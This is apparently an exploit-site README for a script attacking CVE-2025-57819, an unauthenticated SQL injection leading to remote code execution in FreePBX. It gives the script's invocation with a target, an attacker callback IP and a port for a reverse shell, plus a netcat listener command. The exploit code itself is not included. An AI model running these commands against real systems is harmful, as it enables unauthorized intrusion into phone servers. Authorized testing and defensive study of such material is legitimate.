## https://sploitus.com/exploit?id=9300A862-8FDF-5FB3-B6EB-72DB0241BA85
# CVE-2025-57819 Exploit
## Metadata
- **Severity:** Critical (9.8)
- **Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **Type:** Unauthenticated SQL Injection → Remote Code Execution
- **Affected Software:** FreePBX (endpoint module)
#### Parameters
- Target hostname or IP address (vulnerable FreePBX instance)
- Attacker IP address for reverse shell callback
- Listening port for incoming connection
#### Example:
```bash
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
```
## Listener Setup
Start a listener before executing the exploit:
```bash
nc -lvnp
```
#### Example:
```bash
nc -nlvp 9999
```
## Disclaimer
This tool is intended for educational purposes and authorized security testing only. Unauthorized use against systems without explicit permission is illegal. The author assumes no responsibility for misuse or damage caused by this tool.
## Author
Its1Zero - ic47@protonmail.com
## References
- https://nvd.nist.gov/vuln/detail/cve-2025-57819
- https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
- https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819